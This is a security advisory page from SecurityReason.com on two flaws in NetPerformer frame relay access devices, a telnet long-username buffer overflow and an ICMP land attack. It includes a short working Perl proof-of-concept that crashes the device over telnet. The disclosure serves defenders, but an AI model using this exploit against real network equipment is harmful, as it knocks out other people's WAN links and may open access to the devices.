SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

NetPerformer FRAD ACT Multiple Vulnerabilities


Arrow  SecurityAlert : 1583
Arrow  CVE : CVE-2006-4833
Arrow  CVE : CVE-2006-4832
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : No
Arrow  Local Exploit : Yes
Arrow  Exploit Available : Yes
Arrow  Credit : arif jatmoko
Arrow  Published : 19.09.2006

Arrow  Affected Software : NetPerformer FRAD ACT



Arrow  Advisory Content :  


NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities

.<=[ Arif Jatmoko ]=>.

Release Date : 8 July 2006

Product Affected :

- NetPerformer FRAD ACT SDM-95xx version 7.xx (R1), earlier, and
possibly newer
- NetPerformer FRAD ACT SDM-93xx version 10.x.x (R2), earlier, and
possibly newer
- NetPerformer FRAD ACT SDM-92xx version 9.x.x (R1), earlier, and
possibly newer
- ....

Web Site :
www.netperformer.com

=.[DESCRIPTION].=

NetPerformer Frame Relay Access Device (FRAD) is switching & routing
device
that support Ethernet and SNA protocols, Voice, etc. This device mainly
used for connecting distributed WAN network through frame relay or ATM
network.

=.[DETAILS].=

1. Telnet long username Buffer Overflow.
Passing an overly long username (>4550 char) against telnet service causes
device to reboot. Successful remote exploitation will possibly allows an
attacker gaining access into the device.

==================================
00.^.00==================================
# __START_CODE
#
#!/usr/bin/perl

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "23",

Proto => "TCP"))
{
print "Modhiar'000 ..... killing netperformer ...
$ARGV[0]
port 23...";
sleep(1);
print $socket "LOGIN " . "A" x 4550 . "BCDErn";
sleep(1);
print $socket "PASS " . "rn";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:23n";
}
# __END_CODE

==================================
00.^.00==================================

2. ICMP Land Attack
By sending specially crafted ICMP packets will causes the device to be
hang
up and resetting current TCP handshake connection. In earlier version
possibly will make device to reboot.

WORKAROUND

No Workaround yet for this vulnerability.

Vendor Response Status :
Vendor response very slow since discovered the above vulnerabilities.

Arif Jatmoko //=.
Information System Security Officer
Coca-Cola Bottling Indonesia





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.